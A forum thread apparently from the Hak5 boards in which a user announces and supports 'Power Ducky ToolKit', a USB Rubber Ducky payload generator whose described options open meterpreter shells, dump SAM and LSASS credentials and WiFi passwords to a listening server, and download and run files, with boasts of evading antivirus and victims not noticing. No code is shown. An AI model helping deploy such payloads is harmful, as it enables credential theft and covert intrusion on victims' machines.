Jump to content

Power Ducky ToolKit


b00stfr3ak

Recommended Posts

This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also if any one wants to add to the script, it should be pretty easy all the files are separated for re-usability



Power Shell Scripts for the Hak5 Ducky


1) Fast Meterpreter

2) Reverse Meterpreter

3) Dump Domain and Local Hashes

4) Dump Lsass Process

5) Dump Wifi Passwords

6) Wget Execute

99) Exit


All payloads are written in powershell so nothing should be caught by AV


https://github.com/b00stfr3ak/power-ducky



Fast Meterpreter



Stores the meterpreter script on a web sever, the ducky will then go grab the script using ssl and execute it on the victims machine.



Reverse Meterpreter


Creates a reverse meterpreter shell through powershell injection


Dump Domain and Local Hashes


Makes a copy of the sam and sys file, and then dumps those files through a tcp socket to a listening server.


Dump Lsass Process


Dumps the lsass process through powershell, then reads the file and dumps it through a tcp socket to a listening server.


Dump Wifi Passwords


Dumps all available wifi profiles, and then dumps each file through a tcp socket


Wget Execute


Downloads a file and executes it on the victim's machine

Edited by b00stfr3ak
Link to comment
Share on other sites

  • 4 weeks later...

The power-ducky toolkit has been updated to support SSL. Now you can transfer files from the victim to the attacker all encrypted. It does take a while with larger files however it does work, and happens in the background on the victim computer so they wont notice. Once the correct reg files are downloaded the script will print the hashes to the screen and write them to a file

Link to comment
Share on other sites

Fast Meterpreter has been added to the power-ducky toolkit. This payload stores a meterpreter script on a web server and then all the ducky has to do is download that script through ssl and then execute it. The beauty about this script is that it is 10 lines long and the actual powershell command is less then 200 characters.

Ideas from:

http://www.pentestgeek.com/2013/09/18/invoke-shellcode/

https://forums.hak5.org/index.php?/topic/30398-payload-the-fastest-meterpreter-shell-youll-ever-get/

Link to comment
Share on other sites

  • 4 weeks later...

Has anyone tried this?

It looks good b00stfr3ak, please keep up the great work.

I would try it but I'm away for a few days.

When I get back and try it, I'll give some feedback as best I can.

I'm a bit new to the Ducky, and very glad to see people still coming up with stuff for it.

Link to comment
Share on other sites

  • 2 weeks later...
  • 2 weeks later...

Have you tried implementing Invoke-mimikatz, from powersploit.

This could be implemented. I would just need to ask if I could use his script.

Also how does the dump domain hashes work. I thought you could only dump domain hashes from NTDS.DIT file.

If a computer is on the domain by default it keeps a number of cached credentials stored just in case the workstation can't talk to the domain controller.

Link to comment
Share on other sites

Hey b00stfr3ak, it's factgasm here, also known as Noobero Uno :rolleyes: .

Could you put together a video to demonstrate the use of Power Ducky Toolkit, please? That would be unbelievably useful.

I dropped the inject.bin file on to my micro SD card then inserted that into a target machine via the Ducky and, hey presto, the script ran (hex encoded?).

I wasn't quite sure what to expect.

Once the script stopped running and the command shell closed, nothing obvious appeared to happen on the desktop. I assume the aim of the exploit was to allow a reverse shell to the attacking machine (among other things) which Darren covers in the one of the Hak5 videos. If that's the case I'm going to have to revisit that video until I have the procedure down to a fine art.

You mention that its possible to "6) Wget Execute".

Sounds excellent, that's exactly one of the things I want my Ducky to be able to do. However in looking at the documentation I'm not sure how to go about tailoring the source code in order that it downloads the particular file I want from the particular source website as it appears your source code is written in Ruby.

Please help!

[/thick]

Link to comment
Share on other sites

Hey b00stfr3ak, it's factgasm here, also known as Noobero Uno :rolleyes: .

Could you put together a video to demonstrate the use of Power Ducky Toolkit, please? That would be unbelievably useful.

I dropped the inject.bin file on to my micro SD card then inserted that into a target machine via the Ducky and, hey presto, the script ran (hex encoded?).

I wasn't quite sure what to expect.

Once the script stopped running and the command shell closed, nothing obvious appeared to happen on the desktop. I assume the aim of the exploit was to allow a reverse shell to the attacking machine (among other things) which Darren covers in the one of the Hak5 videos. If that's the case I'm going to have to revisit that video until I have the procedure down to a fine art.

You mention that its possible to "6) Wget Execute".

Sounds excellent, that's exactly one of the things I want my Ducky to be able to do. However in looking at the documentation I'm not sure how to go about tailoring the source code in order that it downloads the particular file I want from the particular source website as it appears your source code is written in Ruby.

Please help!

[/thick]

It would be a good idea to create some video's on this, I just haven't had time. Can you clone the newest repo, this should get rid of the hex option (it was broke and took to much time). The best option to try is fast meterpreter. It is the fastest command and an instant meterpreter shell in memory (so no AV to worry about). Wget Execute is OK but then you have to worry about dropping a binary file and not get caught by AV

Link to comment
Share on other sites

  • 3 weeks later...
  • 1 month later...
  • 2 months later...

possible to allow the script to set 'host ip' to a hostname as well?

Does the script fail with DNS names? It should just pass everything to metasploit. I'll take a look tonight. I plan on re-writting the tool, because the code looks so bad.

Link to comment
Share on other sites

  • 1 month later...

Is it possible to have a sub menu option to set the Meterpreter IP's on the fly (as I use a Multi-hop VPN and my Metasploit IP can change), also add an option to drop a file to load a new Meterpreter into memory at boot up.

Link to comment
Share on other sites

  • 9 months later...

Hello b00stfr3ak

Powerducky is a great tool however the latest version checked in github has some issues...

It seems there was some syntax issue in the main menu.. and the payload to add a user to the admin group fails, since the localadmin word is misspelled.

For the reverse shell attack I am able to make it work from the rubber ducky, the payload is injected and i got a message in my attacking machine (sending stage to victim xx bytes) but it hangs there.... I tried to use the meterpreter X64 (since my victim machine uses an x64 architecture) but powershell just dies in the victim machine. It seems the payload needs to be specific for a x64 victim and your payload in github is specific for 32 bits.. do you have a reverse shell payload for x64? thank you....

Link to comment
Share on other sites

Hello b00stfr3ak

Powerducky is a great tool however the latest version checked in github has some issues...

It seems there was some syntax issue in the main menu.. and the payload to add a user to the admin group fails, since the localadmin word is misspelled.

For the reverse shell attack I am able to make it work from the rubber ducky, the payload is injected and i got a message in my attacking machine (sending stage to victim xx bytes) but it hangs there.... I tried to use the meterpreter X64 (since my victim machine uses an x64 architecture) but powershell just dies in the victim machine. It seems the payload needs to be specific for a x64 victim and your payload in github is specific for 32 bits.. do you have a reverse shell payload for x64? thank you....

Thanks, I fixed the add admin syntax and it has been pushed to github.

What are the syntax issues with the main menu?

x32 works on x64 OS. It might have been a network issue, because the powershell code did reach the metasploit server. I'm thinking about adding the option to not use a stager, but i'll have to do that later.

For any issues can you post them to github so I can keep track of them. Thanks!

Link to comment
Share on other sites

  • 3 months later...

This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also if any one wants to add to the script, it should be pretty easy all the files are separated for re-usability

Power Shell Scripts for the Hak5 Ducky

1) Fast Meterpreter
2) Reverse Meterpreter
3) Dump Domain and Local Hashes
4) Dump Lsass Process
5) Dump Wifi Passwords
6) Wget Execute
99) Exit

All payloads are written in powershell so nothing should be caught by AV

https://github.com/b00stfr3ak/power-ducky

Fast Meterpreter

Stores the meterpreter script on a web sever, the ducky will then go grab the script using ssl and execute it on the victims machine.

Reverse Meterpreter
Creates a reverse meterpreter shell through powershell injection
Dump Domain and Local Hashes
Makes a copy of the sam and sys file, and then dumps those files through a tcp socket to a listening server.
Dump Lsass Process
Dumps the lsass process through powershell, then reads the file and dumps it through a tcp socket to a listening server.
Dump Wifi Passwords
Dumps all available wifi profiles, and then dumps each file through a tcp socket
Wget Execute
Downloads a file and executes it on the victim's machine

how do i set this up to work in the ducky?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...